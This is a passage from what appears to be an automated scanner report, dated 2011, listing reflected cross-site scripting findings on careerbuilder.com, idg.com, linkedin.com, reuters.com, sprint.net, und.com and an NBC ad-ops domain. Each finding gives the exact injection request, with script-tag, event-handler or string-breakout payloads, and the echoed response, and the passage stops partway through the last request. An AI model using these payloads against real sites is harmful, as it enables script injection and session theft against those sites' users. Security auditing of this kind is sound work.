5.68. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/Jobseeker/Jobs/JobResults.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80ebc'-alert(1)-'94f3da384dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Jobseeker/Jobs/JobResults.aspx?80ebc'-alert(1)-'94f3da384dc=1 HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 183016
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEARWEB49
Date: Sun, 04 Sep 2011 01:25:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
'Close';
var sj_isSiteDown = false;
var sj_loginUrl = 'http://www.careerbuilder.com/share/login.aspx?NextUrl=http%3a%2f%2fwww.careerbuilder.com%2fJobseeker%2fJobs%2fJobResults.aspx%3f80ebc'-alert(1)-'94f3da384dc%3d1&ff=21';
var sj_userAuthStatus = 'Unknown';
var sj_saveJobAjaxPageUrl = 'http://www.careerbuilder.com/AJAX/SaveThisJob.aspx';
</script>
...[SNIP]...

5.69. http://www.idg.com/www/rd.nsf/rd [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.idg.com
Path:	/www/rd.nsf/rd

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f740"%3b4cc57824ccb was submitted in the REST URL parameter 1. This input was echoed as 7f740";4cc57824ccb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /www7f740"%3b4cc57824ccb/rd.nsf/rd HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sun, 04 Sep 2011 01:26:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5080
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www7f740";4cc57824ccb/rd.nsf/rd");
} catch(err) {}</script>
...[SNIP]...

5.70. http://www.idg.com/www/rd.nsf/rd [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.idg.com
Path:	/www/rd.nsf/rd

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 752f0"%3b515516fa31a was submitted in the REST URL parameter 3. This input was echoed as 752f0";515516fa31a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /www/rd.nsf/rd752f0"%3b515516fa31a HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sun, 04 Sep 2011 01:26:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5080
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/rd.nsf/rd752f0";515516fa31a");
} catch(err) {}</script>
...[SNIP]...

5.71. http://www.idg.com/www/rd.nsf/rd [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.idg.com
Path:	/www/rd.nsf/rd

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66e21"-alert(1)-"150c1b8488f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /www/rd.nsf/rd?66e21"-alert(1)-"150c1b8488f=1 HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Sun, 04 Sep 2011 01:26:22 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5093
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/rd.nsf/rd?66e21"-alert(1)-"150c1b8488f=1");
} catch(err) {}</script>
...[SNIP]...

5.72. http://www.linkedin.com/countserv/count/share [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload f0f49<img%20src%3da%20onerror%3dalert(1)>1b27c3e5a24 was submitted in the url parameter. This input was echoed as f0f49<img src=a onerror=alert(1)>1b27c3e5a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903f0f49<img%20src%3da%20onerror%3dalert(1)>1b27c3e5a24 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:45:54 GMT
Content-Length: 182

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.reuters.com\/article\/2011\/09\/03\/us-weather-football-idUSTRE78222D20110903f0f49<img src=a onerror=alert(1)>1b27c3e5a24"});

5.73. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nbcudigitaladops.com
Path:	/hosted/util/getRemoteDomainCookies.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b935c<script>alert(1)</script>6522d81e549 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hosted/util/getRemoteDomainCookies.js?callback=__nbcadops_xasis.getRemoteDomainCookiesCallbackb935c<script>alert(1)</script>6522d81e549 HTTP/1.1
Host: www.nbcudigitaladops.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xa=n

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
Content-Type: application/javascript
ETag: "15f491-44-4aacd3f4ef780"
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Sun, 04 Sep 2011 00:52:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:52:42 GMT
Connection: close

__nbcadops_xasis.getRemoteDomainCookiesCallbackb935c<script>alert(1)</script>6522d81e549("xa=n; pers_cookie_insert_nbc_blogs_80=2227425856.20480.0000");

5.74. http://www.reuters.com/assets/commentsChild [articleId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/commentsChild

Issue detail

The value of the articleId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1582a"><script>alert(1)</script>fe132c51c05 was submitted in the articleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&articleId=USTRE78222D201109031582a"><script>alert(1)</script>fe132c51c05&headline=Notre+Dame+football+stadium+cleared+due+to+lightning&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 4901



<!--[if !IE]> token: 3d278813-504e-4191-9b77-555036e7e9b3 <
...[SNIP]...
<input type="hidden" name="article_id" value="USTRE78222D201109031582a"><script>alert(1)</script>fe132c51c05" />
...[SNIP]...

5.75. http://www.reuters.com/assets/commentsChild [channel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/commentsChild

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1018"><script>alert(1)</script>71adda7c438 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&articleId=USTRE78222D20110903&headline=Notre+Dame+football+stadium+cleared+due+to+lightning&channel=domesticNewsf1018"><script>alert(1)</script>71adda7c438&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 5218



<!--[if !IE]> token: 0fe4c1fd-5429-477a-8e92-7320039c4b12 <
...[SNIP]...
<input type="hidden" name="channel" value="domesticNewsf1018"><script>alert(1)</script>71adda7c438" />
...[SNIP]...

5.76. http://www.reuters.com/assets/searchIntercept [blob parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/searchIntercept

Issue detail

The value of the blob request parameter is copied into the HTML document as plain text between tags. The payload f02e5<script>alert(1)</script>d14b997ec00 was submitted in the blob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/searchIntercept?blob=notre%20dame%20footballf02e5<script>alert(1)</script>d14b997ec00 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie; __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:00:17 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 4 Sep 2011 01:00:18 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 572



<!--[if !IE]> token: a723f467-3f78-4872-b9c9-ee09ff7f28a7 <
...[SNIP]...
<div class="searchTerm">"notre dame footballf02e5<script>alert(1)</script>d14b997ec00"</div>
...[SNIP]...

5.77. http://www.reuters.com/tracker/guid [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/tracker/guid

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce90a%3balert(1)//6021deac1e7 was submitted in the cb parameter. This input was echoed as ce90a;alert(1)//6021deac1e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tracker/guid?cb=doTrack8497ce90a%3balert(1)//6021deac1e7 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:33 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/javascript
Content-Length: 150

typeof doTrack8497ce90a;alert(1)//6021deac1e7==='function'&&doTrack8497ce90a;alert(1)//6021deac1e7({"userID":"8962b548-050e-4d67-833b-b346fcad4aac"});

5.78. https://www.sprint.net/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9afcf"><script>alert(1)</script>b449dded42e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9afcf"><script>alert(1)</script>b449dded42e=1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:01:59 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 16888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/?9afcf"><script>alert(1)</script>b449dded42e=1" />
...[SNIP]...

5.79. https://www.sprint.net/external_videos/pages.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/external_videos/pages.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5e94"><script>alert(1)</script>4a03023a012 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external_videosd5e94"><script>alert(1)</script>4a03023a012/pages.php HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:28:13 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 9557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/external_videosd5e94"><script>alert(1)</script>4a03023a012/pages.php" />
...[SNIP]...

5.80. https://www.sprint.net/external_videos/pages.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/external_videos/pages.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be96b"><script>alert(1)</script>94dcba76cca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external_videos/pages.phpbe96b"><script>alert(1)</script>94dcba76cca HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:28:22 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 9557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/external_videos/pages.phpbe96b"><script>alert(1)</script>94dcba76cca" />
...[SNIP]...

5.81. https://www.sprint.net/index.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4efbd"><script>alert(1)</script>b6a71b50e9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php4efbd"><script>alert(1)</script>b6a71b50e9c HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:28:14 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 9541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/index.php4efbd"><script>alert(1)</script>b6a71b50e9c" />
...[SNIP]...

5.82. https://www.sprint.net/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a007"><script>alert(1)</script>e5b7ce49e23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?4a007"><script>alert(1)</script>e5b7ce49e23=1 HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:28:03 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 16897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/index.php?4a007"><script>alert(1)</script>e5b7ce49e23=1" />
...[SNIP]...

5.83. https://www.sprint.net/min/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/min/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b69"><script>alert(1)</script>f9addac0cb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mine0b69"><script>alert(1)</script>f9addac0cb8/?f=css/global.css,compass_ui/css/smoothness/jquery-ui-1.8.2.custom.css,compass_ui/gallery/s3Slider_mod.css HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:03:12 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/mine0b69"><script>alert(1)</script>f9addac0cb8/" />
...[SNIP]...

5.84. http://www.und.com/allaccess/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/allaccess/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9585"><script>alert(1)</script>1f949ff99a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /allaccesse9585"><script>alert(1)</script>1f949ff99a/ HTTP/1.1
Host: www.und.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:27:58 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/allaccesse9585"><script>alert(1)</script>1f949ff99a/','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.85. http://www.und.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 534b1"><script>alert(1)</script>ea040958e16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico534b1"><script>alert(1)</script>ea040958e16 HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: www.und.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:48 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/favicon.ico534b1"><script>alert(1)</script>ea040958e16','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.86. http://www.und.com/gametracker/launch/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/gametracker/launch/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71bd4"><script>alert(1)</script>f100731304a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gametracker71bd4"><script>alert(1)</script>f100731304a/launch/ HTTP/1.1
Host: www.und.com
